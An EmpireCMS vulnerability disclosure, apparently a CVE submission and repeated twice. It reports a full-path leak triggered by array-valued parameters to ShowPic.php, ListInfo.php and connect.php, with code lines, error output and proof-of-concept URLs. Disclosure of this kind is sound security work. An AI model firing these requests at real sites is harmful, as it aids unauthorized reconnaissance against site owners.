EmpireCMS_Bug
EmpireCMS Bug
[Suggested description] EmpireCMS 6.6 through 7.2 allows remote attackers to discover the full path via an array value for a parameter to class/connect.php.[Additional Information] Location: EmpireCMS 6.6 : /e/admin/tool/ShowPic.php /e/class/connect.phpEmpireCMS 7.0 : /e/class/connect.phpEmpireCMS 7.2 : /e/class/connect.phpCode: EmpireCMS 6.6 : $picurl=htmlspecialchars($_GET['picurl']); $pic_width=htmlspecialchars($_GET['pic_width']); $pic_height=htmlspecialchars($_GET['pic_height']); $url=htmlspecialchars($_GET['url']);Rows:4 Rows:5 Rows:6 Rows:7Return error : htmlspecialchars() expects parameter 1 to be string, array given in /www/e/admin/tool/ShowPic.php on line 4?5?6?7Code: EmpireCMS 6.6 : if($val!=addslashes($val))Rows:373Return error : addslashes() expects parameter 1 to be string, array given in /www/e/class/connect.php on line 373Code: EmpireCMS 7.0 : $val=htmlspecialchars($val,$flags,$char);Rows:457Return error : htmlspecialchars() expects parameter 1 to be string, array given in /www/e/class/connect.php on line 457Code: EmpireCMS 7.2 : $val=htmlspecialchars($val,$flags,$char);Rows:579Return error : htmlspecialchars() expects parameter 1 to be string, array given in /www/e/class/connect.php on line 579Harm: Web site physical path leakage .conditions for execution: Normal access canEdition: EmpireCMS 6.6 EmpireCMS 7.0 EmpireCMS 7.2Cause the cause :htmlspecialchars() expects parameter 1 to be string,Cause the path to leak. addslashes() expects parameter 1 to be string, Cause the path to leak.POC : EmpireCMS 6.6 : http://domain/e/admin/tool/ShowPic.php?url[]=kongxin&pic_height[]=kongxin&pic_width[]=kongxin&picurl[]=kongxin& http://domain/e/action/ListInfo.php?totalnum[]=kongxin&page[]=kongxin&myorder[]=kongxin&orderby[]=kongxin&andor[]=kongxin&ph[]=kongxin&tempid[]=kongxin&line[]=kongxin&endtime[]=kongxin&starttime[]=kongxin&ztid[]=kongxin&ttid[]=kongxin&classid[]=kongxin&mid[]=kongxin&Fix suggestions: Modify the application source code to avoid information leakage.[VulnerabilityType Other] Physical path leaks[Vendor of Product] EmpireCMS[Affected Product Code Base] EmpireCMS - 6.6 EmpireCMS - 7.0 EmpireCMS - 7.2[Affected Component] FileMain.php , ShowPic.phpe , connect.php ,htmlspecialchars() expects parameter 1 to be string, Web site physical path leakage[Attack Type] Remote[Impact Information Disclosure] true[Attack Vectors] The vulnerability can be triggered by directly accessing the URL below: EmpireCMS 6.6 : http://domain/e/admin/tool/ShowPic.php?url[]=kongxin&pic_height[]=kongxin&pic_width[]=kongxin&picurl[]=kongxin& http://domain/e/action/ListInfo.php?totalnum[]=kongxin&page[]=kongxin&myorder[]=kongxin&orderby[]=kongxin&andor[]=kongxin&ph[]=kongxin&tempid[]=kongxin&line[]=kongxin&endtime[]=kongxin&starttime[]=kongxin&ztid[]=kongxin&ttid[]=kongxin&classid[]=kongxin&mid[]=kongxin&[Discoverer] kongxin[Suggested description] EmpireCMS 6.6 allows remote attackers to discover the full path via an array value for a parameter to admin/tool/ShowPic.php.[Additional Information] Location: EmpireCMS 6.6 : /e/admin/tool/ShowPic.php /e/class/connect.phpEmpireCMS 7.0 : /e/class/connect.phpEmpireCMS 7.2 : /e/class/connect.phpCode: EmpireCMS 6.6 : $picurl=htmlspecialchars($_GET['picurl']); $pic_width=htmlspecialchars($_GET['pic_width']); $pic_height=htmlspecialchars($_GET['pic_height']); $url=htmlspecialchars($_GET['url']);Rows:4 Rows:5 Rows:6 Rows:7Return error : htmlspecialchars() expects parameter 1 to be string, array given in /www/e/admin/tool/ShowPic.php on line 4?5?6?7Code: EmpireCMS 6.6 : if($val!=addslashes($val))Rows:373Return error : addslashes() expects parameter 1 to be string, array given in /www/e/class/connect.php on line 373Code: EmpireCMS 7.0 : $val=htmlspecialchars($val,$flags,$char);Rows:457Return error : htmlspecialchars() expects parameter 1 to be string, array given in /www/e/class/connect.php on line 457Code: EmpireCMS 7.2 : $val=htmlspecialchars($val,$flags,$char);Rows:579Return error : htmlspecialchars() expects parameter 1 to be string, array given in /www/e/class/connect.php on line 579Harm: Web site physical path leakage .conditions for execution: Normal access canEdition: EmpireCMS 6.6 EmpireCMS 7.0 EmpireCMS 7.2Cause the cause :htmlspecialchars() expects parameter 1 to be string,Cause the path to leak. addslashes() expects parameter 1 to be string, Cause the path to leak.POC : EmpireCMS 6.6 : http://domain/e/admin/tool/ShowPic.php?url[]=kongxin&pic_height[]=kongxin&pic_width[]=kongxin&picurl[]=kongxin& http://domain/e/action/ListInfo.php?totalnum[]=kongxin&page[]=kongxin&myorder[]=kongxin&orderby[]=kongxin&andor[]=kongxin&ph[]=kongxin&tempid[]=kongxin&line[]=kongxin&endtime[]=kongxin&starttime[]=kongxin&ztid[]=kongxin&ttid[]=kongxin&classid[]=kongxin&mid[]=kongxin&Fix suggestions: Modify the application source code to avoid information leakage.[VulnerabilityType Other] Physical path leaks[Vendor of Product] EmpireCMS[Affected Product Code Base] EmpireCMS - 6.6 EmpireCMS - 7.0 EmpireCMS - 7.2[Affected Component] FileMain.php , ShowPic.phpe , connect.php ,htmlspecialchars() expects parameter 1 to be string, Web site physical path leakage[Attack Type] Remote[Impact Information Disclosure] true[Attack Vectors] The vulnerability can be triggered by directly accessing the URL below: EmpireCMS 6.6 : http://domain/e/admin/tool/ShowPic.php?url[]=kongxin&pic_height[]=kongxin&pic_width[]=kongxin&picurl[]=kongxin& http://domain/e/action/ListInfo.php?totalnum[]=kongxin&page[]=kongxin&myorder[]=kongxin&orderby[]=kongxin&andor[]=kongxin&ph[]=kongxin&tempid[]=kongxin&line[]=kongxin&endtime[]=kongxin&starttime[]=kongxin&ztid[]=kongxin&ttid[]=kongxin&classid[]=kongxin&mid[]=kongxin&[Discoverer] kongxin
Last modified 1yr ago